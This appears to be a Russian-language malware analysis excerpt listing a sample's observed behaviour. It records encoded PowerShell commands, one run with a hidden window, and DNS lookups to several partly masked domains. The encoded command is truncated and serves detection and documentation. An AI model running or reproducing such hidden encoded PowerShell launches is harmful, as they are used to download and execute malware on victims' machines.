Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABGAGoAawBuADcAdQA0AGkAPQAnAEwAZgBuADIAcQB3AGEAJwA7ACQAWQBmAHMANwBqADgAegBvACAAPQAgACcAOAA5ACcAOwAkAFEAcwA1ADgAMQBvAD0AJwBYADcANwBhAHYAegBoAGMAJwA7ACQARwBpAGQAagBzADcAYgBqAD0AJABlAG4Adg...
- DNS ASK bi###iweb.ga
- DNS ASK gl###tele.com
- DNS ASK ma###erter.com
- DNS ASK cr######urwebsitetoday.com
- DNS ASK me####anandco.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABGAGoAawBuADcAdQA0AGkAPQAnAEwAZgBuADIAcQB3AGEAJwA7ACQAWQBmAHMANwBqADgAegBvACAAPQAgACcAOAA5ACcAOwAkAFEAcwA1ADgAMQBvAD0AJwBYADcANwBhAHYAegBoAGMAJwA7ACQARwBpAGQAagBzADcAYgBqAD0AJABlAG4Adg...' (со скрытым окном)